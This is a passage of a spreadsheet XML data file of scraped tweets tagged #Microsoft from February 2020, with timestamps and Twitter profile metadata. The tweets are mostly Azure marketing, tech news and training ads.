    <t>Accelerate Your cloud strategy with Skytap on Azure: https://t.co/YE4Pqyvz6y #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 16:32:02 +0000 2020</t>
  </si>
  <si>
    <t>Join us for the Microsoft Teams Live Events Webcast! We start in 30 minutes!! https://t.co/n9k5ZlbfRL #microsoft #microsoftteams</t>
  </si>
  <si>
    <t>Thu Feb 27 16:31:31 +0000 2020</t>
  </si>
  <si>
    <t>Ready to add value and connect with @Esade event today #IamEsadeAlumni #esade #Wallisellen #Microsoft to #womenintech comment on challenges &amp;amp; solutions #HowToBeaSmartWomaninSTEM #techwomen #coachgabrielamueller #leanin @leaninorg #leaninswitzerland https://t.co/ZZRsrq47VR</t>
  </si>
  <si>
    <t>{'id': 27669981, 'id_str': '27669981', 'name': 'Gabriela Mueller', 'screen_name': 'gabrielamueller', 'location': 'Switzerland', 'description': 'Dynamic International Keynote Speaker Leadership Coach Catalyst &amp; Thought Leader-Inspirational- Swiss-Latin  https://t.co/CRSAdyVsLj', 'url': 'https://t.co/Wc0gzpEYSm', 'entities': {'url': {'urls': [{'url': 'https://t.co/Wc0gzpEYSm', 'expanded_url': 'http://www.gabrielamueller.com', 'display_url': 'gabrielamueller.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/CRSAdyVsLj', 'expanded_url': 'http://gabrielamueller.com', 'display_url': 'gabrielamueller.com', 'indices': [109, 132]}]}}, 'protected': False, 'followers_count': 555, 'friends_count': 576, 'listed_count': 36, 'created_at': 'Mon Mar 30 16:15:29 +0000 2009', 'favourites_count': 1475, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2325,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'http://pbs.twimg.com/profile_images/989773735832907776/TiNHp6le_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989773735832907776/TiNHp6le_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27669981/1524815407',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</si>
  <si>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16:31:24 +0000 2020</t>
  </si>
  <si>
    <t>#cloud      Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing--but we've got you covered. This infographic shows how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/uwibDGH5Uc</t>
  </si>
  <si>
    <t>Thu Feb 27 16:31:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft offers more details on its plans to end Basic Authentication in #Exchange Online, which will cause pain for some organizations. https://t.co/QiIbO2FqEo #security</t>
  </si>
  <si>
    <t>Thu Feb 27 16:31:07 +0000 2020</t>
  </si>
  <si>
    <t>@ESADEAlumni Ready to add value and connect with @Esade event today #IamEsadeAlumni #esade #Wallisellen #Microsoft to #womenintech comment on challenges &amp;amp; solutions #HowToBeaSmartWomaninSTEM #techwomen #coachgabrielamueller #leanin @leaninorg #leaninswitzerland https://t.co/AYrHS46Nf0</t>
  </si>
  <si>
    <t>Thu Feb 27 16:31:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Engineer Pleads Guilty to $10m Fraud Scheme #HRS #Microsoft https://t.co/pNiSAaFHSN https://t.co/LLNxVpxokn</t>
  </si>
  <si>
    <t>{'id': 266576561, 'id_str': '266576561', 'name': 'David Powell', 'screen_name': 'DavidP867', 'location': 'Manchester, England', 'description': 'IT recruitment manager, cyclist, triathlete and triple Ironman Keen interest in IT and business', 'url': 'https://t.co/rdsre5fXVY', 'entities': {'url': {'urls': [{'url': 'https://t.co/rdsre5fXVY', 'expanded_url': 'http://www.hyperec.com', 'display_url': 'hyperec.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1525, 'friends_count': 3955, 'listed_count': 55, 'created_at': 'Tue Mar 15 13:13:42 +0000 2011', 'favourites_count': 1261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7728,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'http://pbs.twimg.com/profile_images/508923293592592386/E8RYUyYx_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/508923293592592386/E8RYUyYx_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/266576561/1460113266',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</si>
  <si>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Thu Feb 27 16:30:30 +0000 2020</t>
  </si>
  <si>
    <t>Discover 7 benefits of integrating #Microsoft #D365 with your other business systems and web services https://t.co/HUOPGdmD1K</t>
  </si>
  <si>
    <t>{'id': 2811044850, 'id_str': '2811044850', 'name': 'Steffi Sperling', 'screen_name': 'CodelessSteffi', 'location': 'Bournemouth, England', 'description': 'Account Manager for an ISV specialising in Access Dimensions integration and automation solutions to improve business processes through integration &amp; automation', 'url': 'https://t.co/5krv4uc9o8', 'entities': {'url': {'urls': [{'url': 'https://t.co/5krv4uc9o8', 'expanded_url': 'https://www.codelessplatforms.com/', 'display_url': 'codelessplatforms.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 320, 'friends_count': 1254, 'listed_count': 93, 'created_at': 'Mon Sep 15 10:38:59 +0000 2014', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2221,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'http://pbs.twimg.com/profile_images/1052846492640272384/E0Ob-0FE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052846492640272384/E0Ob-0FE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2811044850/1501169470',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</si>
  <si>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16:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Get to know @DellEMC #HyperConvergedInfrastructure products: https://t.co/bJKbNn2ufq #VxRail #DellEMC #VMware #Nutanix #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 16:29:42 +0000 2020</t>
  </si>
  <si>
    <t>#Google Takes Aim at #Microsoft Edge With Flurry of Ads
https://t.co/cPUq1YLk0r https://t.co/K8MkumtEAv</t>
  </si>
  <si>
    <t>{'id': 2235329532, 'id_str': '2235329532', 'name': 'John Morgan', 'screen_name': 'johnmorganFL', 'location': 'For now, Earth', 'description': 'Even when he has a 50/50 shot, the odds are 80/20 in his favor ðŸš€', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13494, 'friends_count': 12720, 'listed_count': 44, 'created_at': 'Sun Dec 08 02:06:19 +0000 2013', 'favourites_count': 125, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14491,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'http://pbs.twimg.com/profile_images/1121812566098030593/yIJ3zzjt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121812566098030593/yIJ3zzjt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2235329532/1388183287', 'profile_link_color': '2FC2EF',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</si>
  <si>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16:29:39 +0000 2020</t>
  </si>
  <si>
    <t>I am amazed that #microsoft would create a product like Windows 10 which insults the users with massive pop up ads and then make it impossible to eliminate them.  I have read and read different methods but none work.  Disgusting insult to people who purchase the product https://t.co/XVFsZwpjGm</t>
  </si>
  <si>
    <t>{'id': 47796987, 'id_str': '47796987', 'name': 'Tom Dooley', 'screen_name': 'tomofsnj', 'location': 'USA', 'description': 'Disabled Army Veteran.  I support Veteran causes.  I am retired from a Railroad.  Army.  I support the constitution and         \nTerm limits', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 35281, 'friends_count': 28535, 'listed_count': 134, 'created_at': 'Wed Jun 17 00:54:26 +0000 2009', 'favourites_count': 1199, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33865,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'http://pbs.twimg.com/profile_images/1225561745726545922/KlXexVwc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225561745726545922/KlXexVwc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47796987/1581031705',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</si>
  <si>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16:28:07 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/WZ2gCogS5q #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 16:27:47 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/2bDStCX4qv #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 16:27:37 +0000 2020</t>
  </si>
  <si>
    <t>#AndroidX Support Highlights New #XamarinForms 4.5 Release https://t.co/C4gjRME0Su #Microsoft #Dotnet #Linux #Mac #Windows</t>
  </si>
  <si>
    <t>Thu Feb 27 16:26:04 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure  https://t.co/9v1yixfEL2  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Thu Feb 27 16:24:02 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/bfwerLQ4zg #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 16:22:40 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Goes Live with #Azure Sphere, Its #Linux-Powered #IoT #Security Platform https://t.co/GXI17emoKo</t>
  </si>
  <si>
    <t>{'id': 30828544, 'id_str': '30828544', 'name': 'ApplicationDevTrends', 'screen_name': 'ADTmag', 'location': 'U.S.A.', 'description': 'Application Development Trends provides news, trends, best practices and more for executives, developers and architects in cross-platform environments.', 'url': 'http://t.co/kVxq2k6qFu', 'entities': {'url': {'urls': [{'url': 'http://t.co/kVxq2k6qFu', 'expanded_url': 'http://adtmag.com', 'display_url': 'adtmag.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1784, 'friends_count': 388, 'listed_count': 187, 'created_at': 'Mon Apr 13 07:51:05 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3687, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4B4A4B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/513001078925688832/V0zfNa9m_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/513001078925688832/V0zfNa9m_normal.png', 'profile_link_color': '2C2420', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F4F1E2', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 16:22:12 +0000 2020</t>
  </si>
  <si>
    <t>A New Horizon, a New Career- Get started today on your journey to become a Certified #Microsoft Trainer at the #1 Online Microsoft Approved MCT Presentation Skills Course  https://t.co/9LzKVPq0aN  - Enroll today for a new Tomorrow https://t.co/modq3wwmEk</t>
  </si>
  <si>
    <t>Thu Feb 27 16:22:08 +0000 2020</t>
  </si>
  <si>
    <t>What is Azure Synapse Analytics? We explain. 
#Azure #Microsoft #Analytics #BusinessIntelligence
https://t.co/Q4F8uXQgDY</t>
  </si>
  <si>
    <t>Thu Feb 27 16:22:03 +0000 2020</t>
  </si>
  <si>
    <t>There is no better time to start than now! ITU Online offers the best training to help students reach their dreams. 
Start today, https://t.co/RlZ9sqT8gv
#elearning #ThursdayThoughts #innovation #TrainingDomination #ITPro #Certification #ciscocert #Microsoft #CyberSecurity #PMP https://t.co/okYT4X7jWW</t>
  </si>
  <si>
    <t>Thu Feb 27 16:20:59 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure  https://t.co/jbrYMhqJDT  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 16:19:35 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "FBI Says $140+ Million Paid to Ransomware, Offers Defense Tips:" https://t.co/Rc0769QpF4
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 16:19:21 +0000 2020</t>
  </si>
  <si>
    <t>In an exclusive interaction with Analytics India Magazine, Smita shed light on HDFC Banks SmartUp grants initiative, the tech stack at the bank and how HDFC uses data analytics for banking services in India. #microsoft https://t.co/9CPWmVYlzn https://t.co/fCLvACokVo</t>
  </si>
  <si>
    <t>Thu Feb 27 16:19:01 +0000 2020</t>
  </si>
  <si>
    <t>"Apps News: iOS and Android developers: #Microsoft's Blazor for building mobile apps gains traction - ZDNet #News": https://t.co/KpknTxZnGm</t>
  </si>
  <si>
    <t>{'id': 40173650, 'id_str': '40173650', 'name': 'Global News Report', 'screen_name': 'robinsnewswire', 'location': "RT's Are FYI Purposes Only", 'description': 'Flying the web for trusted world news reports and shopping discounts 24/7. Retweeting for opinions, useful information, and the many voices of Twitter.', 'url': 'http://t.co/DNyCun08Ab', 'entities': {'url': {'urls': [{'url': 'http://t.co/DNyCun08Ab', 'expanded_url': 'http://www.robinspost.com', 'display_url': 'robinspost.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25163, 'friends_count': 17719, 'listed_count': 4002, 'created_at': 'Fri May 15 04:16:20 +0000 2009', 'favourites_count': 553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1567512, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '141106', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/748396533205327872/1I6ru8Ip_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/748396533205327872/1I6ru8Ip_normal.jpg', 'profile_link_color': '880000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '634047', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 16:18:41 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/XJpt07DBN4  #Cloud #CloudComputing #Azure #Microsoft via Azure</t>
  </si>
  <si>
    <t>{'id': 14314862, 'id_str': '14314862', 'name': 'Shane Brighton', 'screen_name': 'shanebrighton', 'location': 'London, England', 'description': 'Helping customers to leverage information and technology for business advantage.', 'url': 'https://t.co/zLuA3rqX47', 'entities': {'url': {'urls': [{'url': 'https://t.co/zLuA3rqX47', 'expanded_url': 'http://linkedin.com/in/shanebrighton', 'display_url': 'linkedin.com/in/shanebrightâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8036, 'friends_count': 3484, 'listed_count': 103, 'created_at': 'Sun Apr 06 11:08:56 +0000 2008', 'favourites_count': 3289, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 52018,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'http://pbs.twimg.com/profile_images/1100770585557286912/Oz7w9LUf_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100770585557286912/Oz7w9LUf_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14314862/1499344694',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</si>
  <si>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16:17:20 +0000 2020</t>
  </si>
  <si>
    <t>@RSAConference College Day
Panelists from #lockheedmartin #microsoft #delltechnologies #intuit #NBCUniversal #walmart  consider best hires in security field are the ones with the most unusual trajectories. https://t.co/iNMHkS7jps</t>
  </si>
  <si>
    <t>{'id': 1032422134650298368, 'id_str': '1032422134650298368', 'name': 'Ana-Maria Musteata', 'screen_name': 'ana_musteata', 'location': '', 'description': 'Grad @MIIS GRA @CNS_Updates | former @un_disarmament WMDB intern | Nukes &amp; US-Russian relations, tweets are my own, RTs/likes â‰  endorsments', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 182, 'listed_count': 1, 'created_at': 'Thu Aug 23 00:19:53 +0000 2018', 'favourites_count': 495, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 152, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1108468416942407686/hQZdBj9h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108468416942407686/hQZdBj9h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1032422134650298368/1546061665',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</si>
  <si>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16:16:43 +0000 2020</t>
  </si>
  <si>
    <t>#redhat helps #microsoft
And proud of it 
Today:
https://t.co/zOcrdm60l6 
See 1)    https://t.co/UO6wFKpZBt
2) https://t.co/g0b7WhSz0I</t>
  </si>
  <si>
    <t>Thu Feb 27 16:16:19 +0000 2020</t>
  </si>
  <si>
    <t>We've written a handy guide on what to do once you've migrated to #office365. Check it out here: https://t.co/SO6UPU4W0f 
#office365migration #sharepoint #microsoft #sharepointupgrade https://t.co/AlHWgPjREi</t>
  </si>
  <si>
    <t>Thu Feb 27 16:15:32 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your #Cloud strategy with Skytap on #Azure. #Microsoft #MSFTadvocate Strategy
https://t.co/qKpG01aZnm</t>
  </si>
  <si>
    <t>Thu Feb 27 16:15:08 +0000 2020</t>
  </si>
  <si>
    <t>5 Tips for creating #Microsoft #PowerAutomate Approval Flows from our very own @ericgregorich - https://t.co/ZmRB13XBkV
@Microsoft #TheMoreYouKnow #MaxYourCloud #AutomateYourCloud #EngageWithAbel https://t.co/neLsWyHgbZ</t>
  </si>
  <si>
    <t>Thu Feb 27 16:12:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft 71-year-old billionaire Charles Simonyi still goes to work https://t.co/cTfmGTRJxV
Wow! Also 2 times in the Space as astronaut, one of the project executives for #Excel development!
Respect!</t>
  </si>
  <si>
    <t>Thu Feb 27 16:12:34 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/WIkC5lHYMv #Microsoft #Azure #Cloud https://t.co/5u8Xjuf9BQ</t>
  </si>
  <si>
    <t>Thu Feb 27 16:10:56 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/FT951v5d4z #microsoft #cloud #Cloud Strategy https://t.co/piAIJv6bzb</t>
  </si>
  <si>
    <t>Thu Feb 27 16:09:59 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure
#Microsoft #Azure
https://t.co/U30umZZEfm</t>
  </si>
  <si>
    <t>Thu Feb 27 16:09:10 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/nlgCa0838K #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 16:06:32 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X's game resume feature even works after a reboot.
https://t.co/BrqVHl3Foa
#gamer #XboxSeriesX #Xbox #Microsoft
@Rapid__RTs 
@RelayRetweets
@SGH_RTs
@GFXCoach
@FearRTs
@ShoutGamers
@ShoutRTs
@FameRTR
via @GoogleNews</t>
  </si>
  <si>
    <t>{'id': 1134146232094298112, 'id_str': '1134146232094298112', 'name': 'OTaY AkRyt3', 'screen_name': 'S1R_AkRyt3', 'location': 'Hidden Leaf Village', 'description': 'A Dastardly Nerd,  Insatiable Geek,  Borderline Weirdo with Issues &amp; a slight Anime and Gaming Problem.. \n\n\n\n\n\nhttps://t.co/shuUNugMGv', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/shuUNugMGv', 'expanded_url': 'http://twitch.tv/s1r_akryt3', 'display_url': 'twitch.tv/s1r_akryt3', 'indices': [111, 134]}]}}, 'protected': False, 'followers_count': 40, 'friends_count': 77, 'listed_count': 0, 'created_at': 'Thu May 30 17:15:07 +0000 2019', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 105, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227457272185577478/DcpLwoqR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227457272185577478/DcpLwoqR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1134146232094298112/1581483593',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</si>
  <si>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16:06:06 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on #Azure https://t.co/GAP65DG0IM via @hybrid_ts #Microsoft https://t.co/c63Ms61NTq</t>
  </si>
  <si>
    <t>{'id': 962396494228807681, 'id_str': '962396494228807681', 'name': 'HYBRID TECHNOLOGY SYSTEMS', 'screen_name': 'HYBRID_TS', 'location': 'London, England', 'description': '#ITReseller delivering #ITSolutions &amp; #ITConsultancy services. We are #Authorsised #HPE #Cisco #Microsoft #Lenovo resellers - Tel: 0333 600 6090', 'url': 'https://t.co/TBNyttHJct', 'entities': {'url': {'urls': [{'url': 'https://t.co/TBNyttHJct', 'expanded_url': 'http://www.hybridtechnologysystems.com', 'display_url': 'hybridtechnologysystems.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 34, 'listed_count': 2, 'created_at': 'Sat Feb 10 18:42:59 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9474, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1060533621151424512/iMEgV6k1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060533621151424512/iMEgV6k1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/962396494228807681/1541685854',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</si>
  <si>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16:05:47 +0000 2020</t>
  </si>
  <si>
    <t>The Benefits of Reliable Inventory Management - Gravity Software https://t.co/MFCE5cHT2M by @vsilvani
#Microsoft #CRM #QuickBooksEnterprise #Cloud #Accounting #Inventory #Purchasing #MultiSite #Financials #OutsourcedCFOs #ERP #FranchiseIndustry #CFOs #Accountants #Bookkeepers https://t.co/TePCQCd9d9</t>
  </si>
  <si>
    <t>Thu Feb 27 16:05:22 +0000 2020</t>
  </si>
  <si>
    <t>Are Local #Windows Accounts #History? #YourITblog via John Simek &amp;amp; @BleepinComputer #Microsoft #cloud #Security #ThursdayWisdom #ThursdayThought #computers #email #smallbusinessowners  https://t.co/k7ae4iEKig https://t.co/FjcQZpRIVc</t>
  </si>
  <si>
    <t>Thu Feb 27 16:05:19 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN IKEv2 features and limitations. #Windows10 #Win10 #Microsoft #mobility #aovpn https://t.co/uAlUBBI5d7</t>
  </si>
  <si>
    <t>Thu Feb 27 16:03:53 +0000 2020</t>
  </si>
  <si>
    <t>I am a fan of sexy Netflix #Microsoft</t>
  </si>
  <si>
    <t>{'id': 744213818612584448, 'id_str': '744213818612584448', 'name': 'Spam Magnet', 'screen_name': 'SpamMagnetBot', 'location': '', 'description': 'Please tell me more about your product or service! A bot by @danhett', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 113, 'friends_count': 0, 'listed_count': 149, 'created_at': 'Sat Jun 18 17:02:56 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 64767,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'http://pbs.twimg.com/profile_images/744214186130083840/4e3RVeQO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/744214186130083840/4e3RVeQO_normal.jpg',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</si>
  <si>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16:03:05 +0000 2020</t>
  </si>
  <si>
    <t>Wanting to get started in Power Apps? ..and not sure where to start, why not get a jump start.
.
https://t.co/JbTnVxOsqW
#powerapp #futureofwork #gigmindset #microsoft
 https://t.co/qWjFsmMnZx</t>
  </si>
  <si>
    <t>{'id': 3040952027, 'id_str': '3040952027', 'name': 'Collab365 Conference', 'screen_name': 'COLLA365', 'location': 'Online', 'description': "Collab365 Global Conference is the worlds biggest 24-hour online conference. 10,000 registrations #Office365 #SharePoint #Azure. 62 MVPs, 120+ sessions 6 MCM's.", 'url': 'http://t.co/I3dgP1ywEo', 'entities': {'url': {'urls': [{'url': 'http://t.co/I3dgP1ywEo', 'expanded_url': 'http://www.collab365.events', 'display_url': 'collab365.events', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2917, 'friends_count': 2329, 'listed_count': 104, 'created_at': 'Mon Feb 16 16:02:28 +0000 2015', 'favourites_count': 1237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3165,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'http://pbs.twimg.com/profile_images/855043015764656128/sITbHUxU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/855043015764656128/sITbHUxU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3040952027/1562517330', 'profile_link_color': 'C13126',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</si>
  <si>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16:02:45 +0000 2020</t>
  </si>
  <si>
    <t>The @AzureBackup team is on a role! Great work team!
- the Preview of Cross Region Restore of Azure VMs has now expanded to
-- Australia East
-- Australia South East
-- West US 2
-- West Central US
https://t.co/NjEkPNQtjg
#Azure #Microsoft #Cloud #DisasterRecovery #BCDR #Backup https://t.co/k50Ts6trQd</t>
  </si>
  <si>
    <t>Thu Feb 27 16:02:26 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/L42iqcs2N9 watch via @YouTube Xbox gamers and I will explain how you can benefit from being a Xbox Ambassador right now #xboxsweeptakes #Xbox #Microsoft https://t.co/3SyfFNTb74</t>
  </si>
  <si>
    <t>{'id': 923909150, 'id_str': '923909150', 'name': 'Anthony Allen', 'screen_name': 'AnthonyAllenYT', 'location': 'Birmingham, England', 'description': 'Creative All Rounder actively seeking more opportunities to help My Youtube Subscribers and Fans', 'url': 'https://t.co/5IYmgPuYhl', 'entities': {'url': {'urls': [{'url': 'https://t.co/5IYmgPuYhl', 'expanded_url': 'http://www.youtube.com/AnthonyAllenEdits', 'display_url': 'youtube.com/AnthonyAllenEdâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1966, 'friends_count': 1563, 'listed_count': 82, 'created_at': 'Sat Nov 03 19:47:18 +0000 2012', 'favourites_count': 1171, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7322,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'http://pbs.twimg.com/profile_images/1235160018187669504/-0e4xSzW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235160018187669504/-0e4xSzW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/923909150/1582802687', 'profile_link_color': '981CEB',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</si>
  <si>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Thu Feb 27 16:02:16 +0000 2020</t>
  </si>
  <si>
    <t>***Tip of the Day ***
To configure and enable password writeback, sign into your Azure AD Connect server and start the Azure AD Connect configuration wizard.
Here's how to do it:
https://t.co/lD9xxlylJS
#Microsoft #EntrepriseMobilityAndSecurity #AzureADConnect https://t.co/9sUnpagkoY</t>
  </si>
  <si>
    <t>Thu Feb 27 16:01:58 +0000 2020</t>
  </si>
  <si>
    <t>#MAGA trumpbannon is coming for you
#Microsoft
#Apple
#Google
#Amazon
tick...tock...</t>
  </si>
  <si>
    <t>{'id': 2480863531, 'id_str': '2480863531', 'name': 'LuLu S', 'screen_name': 'IwantLuLu', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 306, 'friends_count': 2050, 'listed_count': 3, 'created_at': 'Wed May 07 00:40:36 +0000 2014', 'favourites_count': 10722, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13008,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'http://pbs.twimg.com/profile_images/884933587371294720/nW168LrG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/884933587371294720/nW168LrG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2480863531/1577851909',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</si>
  <si>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16:01:57 +0000 2020</t>
  </si>
  <si>
    <t>Dont miss out on tickets to a free workshop with Wirehive and the #Microsoft #Azure team. https://t.co/lY5UeDTUPt</t>
  </si>
  <si>
